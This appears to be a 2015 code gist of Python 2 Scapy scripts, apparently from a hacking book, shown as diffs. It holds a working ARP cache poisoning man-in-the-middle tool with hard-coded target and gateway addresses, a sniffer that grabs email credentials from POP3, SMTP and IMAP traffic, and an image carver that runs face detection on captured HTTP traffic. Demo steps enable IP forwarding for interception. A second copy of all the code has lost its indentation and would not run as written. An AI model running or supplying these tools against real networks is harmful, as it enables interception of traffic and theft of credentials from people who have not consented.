sh1nu11bi · February 18, 2015 17:48
diff --git a/arper.py b/arper.py
 from scapy.all import *
 import os
 import sys
 import threading

 interface    = "en1"
 target_ip    = "172.16.1.71"
 gateway_ip   = "172.16.1.254"
 packet_count = 1000
 poisoning    = True
    
 def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    
    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
    
 def get_mac(ip_address):
    
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    
    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src
    
    return None
    
 def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    global poisoning
   
    poison_target = ARP()
    poison_target.op   = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac

    poison_gateway = ARP()
    poison_gateway.op   = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while poisoning:
        send(poison_target)
        send(poison_gateway)
          
        time.sleep(2)
          
    print "[*] ARP poison attack finished."

    return

 # set our interface
 conf.iface = interface

 # turn off output
 conf.verb  = 0

 print "[*] Setting up %s" % interface

 gateway_mac = get_mac(gateway_ip)

 if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
 else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

 target_mac = get_mac(target_ip)

 if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
 else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)
    
 # start poison thread
 poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
 poison_thread.start()

 try:
    print "[*] Starting sniffer for %d packets" % packet_count
    
    bpf_filter  = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
    
 except KeyboardInterrupt:
    pass

 finally:
    # write out the captured packets
    print "[*] Writing packets to arper.pcap"
    wrpcap('arper.pcap',packets)

    poisoning = False

    # wait for poisoning thread to exit
    time.sleep(2)

    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)
diff --git a/mail_sniffer.py b/mail_sniffer.py
 import threading
 from scapy.all import *

 # our packet callback
 def packet_callback(packet):
    
    if packet[TCP].payload:
    
        mail_packet = str(packet[TCP].payload)

        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():

            print "[*] Server: %s" % packet[IP].dst
            print "[*] %s" % packet[TCP].payload

            
 # fire up our sniffer
 sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)
diff --git a/pic_carver.py b/pic_carver.py
 import re
 import zlib
 import cv2

 from scapy.all import *

 pictures_directory = "pic_carver/pictures"
 faces_directory    = "pic_carver/faces"
 pcap_file          = "bhp.pcap"

 def face_detect(path,file_name):

        img     = cv2.imread(path)
        cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
        rects   = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

        if len(rects) == 0:
                return False
        		
        rects[:, 2:] += rects[:, :2]

 	# highlight the faces in the image        
 	for x1,y1,x2,y2 in rects:
 		cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)

 	cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)

        return True

 def get_http_headers(http_payload):
 	
 	try:
 		# split the headers off if it is HTTP traffic
 		headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]
 	
 		# break out the headers
 		headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
 	except:
 		return None
 	
 	if "Content-Type" not in headers:
 		return None
 	
 	return headers

 def extract_image(headers,http_payload):
 	
 	image      = None
 	image_type = None
 	
 	try:
 		if "image" in headers['Content-Type']:
 			
 			# grab the image type and image body
 			image_type = headers['Content-Type'].split("/")[1]
 		
 			image = http_payload[http_payload.index("\r\n\r\n")+4:]
 		
 			# if we detect compression decompress the image
 			try:
 				if "Content-Encoding" in headers.keys():
 					if headers['Content-Encoding'] == "gzip":
 						image = zlib.decompress(image,16+zlib.MAX_WBITS)
 					elif headers['Content-Encoding'] == "deflate":
 						image = zlib.decompress(image)
 			except:
 				pass	
 	except:
 		return None,None
 	
 	return image,image_type

 def http_assembler(pcap_file):

 	carved_images   = 0
 	faces_detected  = 0

 	a = rdpcap(pcap_file)
 	
 	sessions      = a.sessions()	

 	for session in sessions:

 		http_payload = ""
 		
 		for packet in sessions[session]:
 	
 			try:
 				if packet[TCP].dport == 80 or packet[TCP].sport == 80:
 	
 					# reassemble the stream into a single buffer
 					http_payload += str(packet[TCP].payload)
 	
 			except:
 				pass
 	
 		headers = get_http_headers(http_payload)
 		
 		if headers is None:
 			continue
 	
 		image,image_type = extract_image(headers,http_payload)
 	
 		if image is not None and image_type is not None:				
 		
 			# store the image
 			file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
 			fd = open("%s/%s" % (pictures_directory,file_name),"wb")
 			fd.write(image)
 			fd.close()
 			
 			carved_images += 1
 					
 			# now attempt face detection
 			try:
 				result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)
 				
 				if result is True:
 					faces_detected += 1
 			except:
 				pass
 			

 	return carved_images, faces_detected


 carved_images, faces_detected = http_assembler(pcap_file)

 print "Extracted: %d images" % carved_images
 print "Detected: %d faces" % faces_detected
diff --git a/pic_carver_dir.txt b/pic_carver_dir.txt
 Install OpenCV libraries with the following command

 localhost$ apt-get install python-opencv python-numpy python-scipy

 files to handle facial detection
 wget http://electi.cc/files/2008/03/haarcascade_frontalface_alt.xml

 Dropping files to made directories
 localhost$ mkdir pictures
 localhost$mkdir faces

 localhost$python pic_carver.py
diff --git a/scapy.txt b/scapy.txt
 http://www.secdev.org/projects/scapy/

 ARP Cache Poisoning with Scapy

 run : ipconfig

 Find Ip for Default gateway

 run : arp -a 

 Match ARP gateway to MAC address


 DEMO:
 localhost$ echo 1 > /proc/sys/net/ipv4/ip_forward

 localhost$ sudo python2.7 arper.py 


 localhost$arp -a
	from scapy.all import *
	import os
	import sys
	import threading

	interface = "en1"
	target_ip = "172.16.1.71"
	gateway_ip = "172.16.1.254"
	packet_count = 1000
	poisoning = True

	def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):

	# slightly different method using send
	print "[*] Restoring target..."
	send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
	send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

	def get_mac(ip_address):

	responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

	# return the MAC address from a response
	for s,r in responses:
	return r[Ether].src

	return None

	def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
	global poisoning

	poison_target = ARP()
	poison_target.op = 2
	poison_target.psrc = gateway_ip
	poison_target.pdst = target_ip
	poison_target.hwdst= target_mac

	poison_gateway = ARP()
	poison_gateway.op = 2
	poison_gateway.psrc = target_ip
	poison_gateway.pdst = gateway_ip
	poison_gateway.hwdst= gateway_mac

	print "[*] Beginning the ARP poison. [CTRL-C to stop]"

	while poisoning:
	send(poison_target)
	send(poison_gateway)

	time.sleep(2)

	print "[*] ARP poison attack finished."

	return

	# set our interface
	conf.iface = interface

	# turn off output
	conf.verb = 0

	print "[*] Setting up %s" % interface

	gateway_mac = get_mac(gateway_ip)

	if gateway_mac is None:
	print "[!!!] Failed to get gateway MAC. Exiting."
	sys.exit(0)
	else:
	print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

	target_mac = get_mac(target_ip)

	if target_mac is None:
	print "[!!!] Failed to get target MAC. Exiting."
	sys.exit(0)
	else:
	print "[*] Target %s is at %s" % (target_ip,target_mac)

	# start poison thread
	poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
	poison_thread.start()

	try:
	print "[*] Starting sniffer for %d packets" % packet_count

	bpf_filter = "ip host %s" % target_ip
	packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

	except KeyboardInterrupt:
	pass

	finally:
	# write out the captured packets
	print "[*] Writing packets to arper.pcap"
	wrpcap('arper.pcap',packets)

	poisoning = False

	# wait for poisoning thread to exit
	time.sleep(2)

	# restore the network
	restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
	sys.exit(0)
	import threading
	from scapy.all import *

	# our packet callback
	def packet_callback(packet):

	if packet[TCP].payload:

	mail_packet = str(packet[TCP].payload)

	if "user" in mail_packet.lower() or "pass" in mail_packet.lower():

	print "[*] Server: %s" % packet[IP].dst
	print "[*] %s" % packet[TCP].payload


	# fire up our sniffer
	sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)
	import re
	import zlib
	import cv2

	from scapy.all import *

	pictures_directory = "pic_carver/pictures"
	faces_directory = "pic_carver/faces"
	pcap_file = "bhp.pcap"

	def face_detect(path,file_name):

	img = cv2.imread(path)
	cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
	rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

	if len(rects) == 0:
	return False

	rects[:, 2:] += rects[:, :2]

	# highlight the faces in the image
	for x1,y1,x2,y2 in rects:
	cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)

	cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)

	return True

	def get_http_headers(http_payload):

	try:
	# split the headers off if it is HTTP traffic
	headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]

	# break out the headers
	headers = dict(re.findall(r"(?P<name>.?): (?P<value>.?)\r\n", headers_raw))
	except:
	return None

	if "Content-Type" not in headers:
	return None

	return headers

	def extract_image(headers,http_payload):

	image = None
	image_type = None

	try:
	if "image" in headers['Content-Type']:

	# grab the image type and image body
	image_type = headers['Content-Type'].split("/")[1]

	image = http_payload[http_payload.index("\r\n\r\n")+4:]

	# if we detect compression decompress the image
	try:
	if "Content-Encoding" in headers.keys():
	if headers['Content-Encoding'] == "gzip":
	image = zlib.decompress(image,16+zlib.MAX_WBITS)
	elif headers['Content-Encoding'] == "deflate":
	image = zlib.decompress(image)
	except:
	pass
	except:
	return None,None

	return image,image_type

	def http_assembler(pcap_file):

	carved_images = 0
	faces_detected = 0

	a = rdpcap(pcap_file)

	sessions = a.sessions()

	for session in sessions:

	http_payload = ""

	for packet in sessions[session]:

	try:
	if packet[TCP].dport == 80 or packet[TCP].sport == 80:

	# reassemble the stream into a single buffer
	http_payload += str(packet[TCP].payload)

	except:
	pass

	headers = get_http_headers(http_payload)

	if headers is None:
	continue

	image,image_type = extract_image(headers,http_payload)

	if image is not None and image_type is not None:

	# store the image
	file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
	fd = open("%s/%s" % (pictures_directory,file_name),"wb")
	fd.write(image)
	fd.close()

	carved_images += 1

	# now attempt face detection
	try:
	result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)

	if result is True:
	faces_detected += 1
	except:
	pass


	return carved_images, faces_detected


	carved_images, faces_detected = http_assembler(pcap_file)

	print "Extracted: %d images" % carved_images
	print "Detected: %d faces" % faces_detected
	Install OpenCV libraries with the following command

	localhost$ apt-get install python-opencv python-numpy python-scipy

	files to handle facial detection
	wget http://electi.cc/files/2008/03/haarcascade_frontalface_alt.xml

	Dropping files to made directories
	localhost$ mkdir pictures
	localhost$mkdir faces

	localhost$python pic_carver.py
	http://www.secdev.org/projects/scapy/

	ARP Cache Poisoning with Scapy

	run : ipconfig

	Find Ip for Default gateway

	run : arp -a

	Match ARP gateway to MAC address


	DEMO:
	localhost$ echo 1 > /proc/sys/net/ipv4/ip_forward

	localhost$ sudo python2.7 arper.py


	localhost$arp -a